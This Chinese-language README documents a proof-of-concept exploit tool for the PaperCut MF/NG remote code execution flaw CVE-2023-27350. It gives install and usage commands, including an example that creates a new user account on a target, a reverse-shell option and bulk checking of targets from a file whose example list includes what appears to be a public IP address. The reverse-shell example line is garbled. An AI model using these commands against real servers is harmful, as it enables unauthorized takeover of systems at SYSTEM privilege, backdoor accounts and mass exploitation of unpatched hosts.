
针对 Papercut CVE-2023-27350 的利用程序。[+] 反向 shell [+] 批量检测
这是针对 CVE-2023-27350 的概念验证(POC)利用代码,该漏洞存在于 PaperCut MF/NG 中,允许未经身份验证的攻击者以 SYSTEM 权限执行任意代码。
在使用此利用代码前,请确保已安装以下库:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u, --url: 目标 PaperCut MF/NG 应用的 URL(例如 http://target-ip:9191)。-c, --command: 要在目标系统上执行的命令。--reverse-shell: 使用反弹 Shell 载荷在目标系统上执行命令。-f, --file: 从文件中检查多个目标(例如 file.txt)。要在目标系统上执行命令,使用 -c 选项:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
要使用反弹 Shell 载荷在目标系统上执行命令,使用 --reverse-shell 选项。系统将提示您输入 IP 地址和端口号:
: : <> : <>
要从文件中检查多个目标,使用 -f 选项。文件格式应为 ip_address:port:
python CVE-2023-27350.py -f file.txt
file.txt当使用批量检查选项时,请确保 file.txt 文件的内容格式正确。
文件的每一行应包含目标的 IP 地址和端口号,以冒号 : 分隔。例如:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
确保 IP 地址、冒号和端口号之间没有多余的空格或字符。同时,确保每行只包含一个 IP 地址和端口号。
此版本源自 horizon3ai/CVE-2023-27350 仓库。原始漏洞利用代码的所有荣誉归原作者所有。